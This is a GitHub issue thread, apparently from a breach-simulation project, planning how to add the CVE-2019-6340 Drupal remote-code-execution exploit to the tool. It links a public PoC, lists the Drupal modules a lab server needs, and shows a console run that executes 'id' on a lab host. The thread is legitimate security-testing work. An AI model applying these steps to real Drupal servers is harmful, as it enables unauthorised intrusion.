Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

CVE-2019-6340 (Drupal exploit) #669

Closed
2 tasks
ShayNehmad opened this issue May 27, 2020 · 5 comments · Fixed by #808
Closed
2 tasks

CVE-2019-6340 (Drupal exploit) #669

ShayNehmad opened this issue May 27, 2020 · 5 comments · Fixed by #808
Assignees
@ophirharpazg
Labels
Feature Issue that describes a new feature to be implemented.
Milestone
1.10.0

Comments

@ShayNehmad
Copy link
Contributor

ShayNehmad commented May 27, 2020
edited
Loading

https://gist.github.com/leonjza/d0ab053be9b06fa020b66f00358e3d88/f9f6a5bb6605745e292bee3a4079f261d891738a

  • Add the exploit to Monkey
  • Add the exploit test to Zoo
@ShayNehmad ShayNehmad added e/3 Feature Issue that describes a new feature to be implemented. labels May 27, 2020
@ShayNehmad ShayNehmad added this to the 1.9.0 milestone May 27, 2020
@ophirharpazg
Copy link
Contributor

ophirharpazg commented Jun 14, 2020
edited
Loading

  • Decide which class is more appropriate for this exploit (WebRCE or HostExploiter)
  • Add a new exploit file and make it run some dummy code when Drupal port / server is found
  • Get a vulnerable Drupal server up and running
  • Integrate the exploit code into the monkey (logs, telemetry)
  • Add content on exploit findings to the Monkey report (CVE details, mitigation)
  • Add an automatic test to the Monkey Zoo

Some more things:

  • Is a scanner needed to identify Drupal servers? Or should we simply add a port number to the configuration?

@VakarisZ
Copy link
Contributor

Use WebRCE for this one. Regarding ports, I think we have a list of webports that we try for all web exploits. If drupal has a unique default port then add it to config, but as far as scanning goes, we only need custom scanner if the actual exploit attempt takes a long time.

@ophirharpazg
Copy link
Contributor

FWIW, to set up a vulnerable Drupal server I used this tutorial, and made sure the following modules are installed (in the Drupal UI Extend menu):

  • REST Web Services
  • HTTP Basic Authentication
  • Node

For experimenting with the exploit quoted in this issue, you need to be acquainted with clearing cache, which is done from Configuration > Performance menu.

Running the exploit looks like that:

PS C:\Users\ophir.harpaz\Desktop\Guardicore\monkey\drupal> python .\cve-2019-6340.py http://172.23.74.255/ id
CVE-2019-6340 Drupal 8 REST Services Unauthenticated RCE PoC
 by @leonjza

References:
 https://www.drupal.org/sa-core-2019-003
 https://www.ambionics.io/blog/drupal8-rce

[warning] Caching heavily affects reliability of this exploit.
Nodes are used as they are discovered, but once they are done,
you will have to wait for cache expiry.

Targetting http://172.23.74.255/...
[+] Finding a usable node id...
[+] Using node_id 1
requesting http://172.23.74.255/node/1
[+] Target appears to be vulnerable!

uid=33(www-data) gid=33(www-data) groups=33(www-data)

@itaymmguardicore itaymmguardicore modified the milestones: 1.9.0, 1.10.0 Aug 11, 2020
@ophirharpazg
Copy link
Contributor

image

@ophirharpazg ophirharpazg mentioned this issue Aug 27, 2020
Merged
5 tasks
@VakarisZ
Copy link
Contributor

Nice! But icons tell me that you need to backmerge

@snyk-bot snyk-bot mentioned this issue May 23, 2021
Open
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@ophirharpazg ophirharpazg

Labels
Feature Issue that describes a new feature to be implemented.
Projects
None yet
Milestone
1.10.0
Development

Successfully merging a pull request may close this issue.

669/drupal guardicore/monkey
4 participants
@itaymmguardicore @VakarisZ @ophirharpazg @ShayNehmad